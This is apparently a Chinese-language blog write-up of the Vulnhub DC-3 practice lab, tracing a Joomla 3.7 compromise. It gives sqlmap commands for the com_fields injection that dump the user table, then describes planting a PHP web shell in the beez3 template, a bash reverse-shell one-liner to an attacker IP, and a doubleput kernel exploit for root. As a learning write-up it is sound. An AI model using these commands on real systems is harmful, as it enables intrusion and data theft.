Preface

光怪陆离都经历,山川湖海放心里

本篇为vulnhub系列DC3啦,距DC2这段时间发生了许许多多的事情,有好有坏,都过来了,哈哈哈……开始前说点废话,练习过程中也是参考了许多大师傅们写的文章才完成了,在此记录一下,也非常希望师傅们能指正错误。

Process

信息收集

老方法,先用nmap扫描一下,对师父们来说都是小意思,就不在挂图赘述啦,得到靶机IP以及只开放了80端口,那么直接访问web服务

index

可以看到直接就是登录页面,我是先用dirsearch扫描了一遍目录,扫描出来了后台登录页面以及其他目录,后面会用到,现在先不说,然后用cms指纹识别插件看一下网站信息

fingerprint

网站cms事Joomla,操作系统是Ubuntu,但是具体的版本号我们没有,这里有两个方法

  1. 在dirsearch扫描出来的目录中有README.txt文件,直接访问可以在里面查看到版本号

    readme

  2. 看其他师傅的文章的时候发现很多师傅用了joomscan这个工具,kali自带,直接扫描网站也可以得到版本以及其他目录信息,两个方法师傅们可以自己参考决定哈

    漏洞利用

    查到版本号后我直接百度了对应的漏洞利用文章,找到了sql注入,可以直接使用sqlmap跑,当然参考文章后发现大部分师傅是用searchsploit找的joomla3.7的漏洞,不过最后都是使用sqlmap注入,emmmm渗透过程就是这样,需要用不同的方法达到目的,不管是百度出来的文章还是searchsploit提供的都有payload

    sqlmap -u “http://192.168.16.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" –risk=3 –level=5 –random-agent –dbs -p list[fullordering]

下面直接开始跑

database

可以看到跑出来数据库了,那么就往下继续跑,由于贴太多图没必要,就直接放最后的结果啦

payload:sqlmap -u “http://192.168.16.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" –risk=3 –level=5 –random-agent –dump -D joomladb -T ‘#__users’ -p list[fullordering]

users

可以看到用户名密码已经出来了,但是密码是经过加密的,可以直接用john直接破解出来,john使用方法这里就不再说了哈,百度很多文章,下面直接在扫描出来的后台登录页面登录

login

登录进去后就寻找利用点,本来以为会有文件上传的洞,后来看其他师傅的文章发现可以在模板目录下面写入php文件,那么直接写入一个php一句话进行连接

shell

不过需要注意路径,因为是在beez3的模板中写入的,所以文件路径就是/templates/beez3/html/shell.php,当然师傅们也可以写在其他路径中,能getshell就可以哈,然后使用蚁剑连接

antsword

但是现在只是www-data权限,无法访问root目录,需要进一步提权,为了操作方便我们先反弹一个shell(其实这一步可以省略,既然涉及到了还是讲一下吧),本来是看到靶机有nc的,然后就一直试着用nc连接,但是一直报错连不上,后来看师傅们的文章发现是因为sh解析问题,于是用了其他师傅的反弹方法

kali先开启监听端口:nc -lvp 8888

然后在蚁剑中反向回连:bash -c ‘bash -i >& /dev/tcp/192.168.16.128/8888 0>&1’

这里简单解析一下bash反弹shell的命令,如果师傅们想了解原理的可以参考这两篇文章:Linux之bash反弹shell原理浅析Linux各种一句话反弹shell总结

bash -c:使用bash执行-c选项后面跟的命令

bash -i:产生一个交互式bash

/dev/tcp/192.168.16.128/8888:与192.168.16.128:8888端口产生一个tcp连接

>&、0>&1:将正确输出以及错误输出回显到攻击机

nc

反弹成功,接下来就是进行提权了

提权

看了几个目录后发现没有什么信息,这就开始提权之旅,不过也是看了大师傅们的文章才知道的,可以先看下靶机的版本信息

release

可以看到是Ubuntu16.0.4版本的,那么就去searchsploit看下有没有对应的利用脚本(searchsploit我在前面的渗透测试Vulnhub-DC1中有写到)

searchsploit_ubuntu

对应的提权payload有很多,我也是偷懒看的师傅们试出来的脚本,然后直接查看利用方式

exp

后面直接有exp的链接,是在github上面,直接在靶机中wget下载是不行的(也可能是我的网络问题),需要先下到本地,其实我本地也访问不了,开了VPN下载的,然后直接让exp放到靶机中,这里有两个方法

  1. 直接复制到蚁剑中,比较简单

  2. 先让exp放到kali的web目录下,然后开启web服务,然后在靶机中wget从kali上面下载

    然后解压以后直接利用就可以啦,解压步骤这里就赘述了,直接解压exploit包就行。然后直接利用

    root

    能看到,先执行compile.sh文件,然后再执行doubleput就可以了,成功提权,最后查看flag

    flag

    结束啦

    Ending

    暑假开始,我这个网安菜鸟也会好好利用这个暑假提升自己,也非常希望各位师傅能多多指教,就这么结尾吧,日后请多多关照!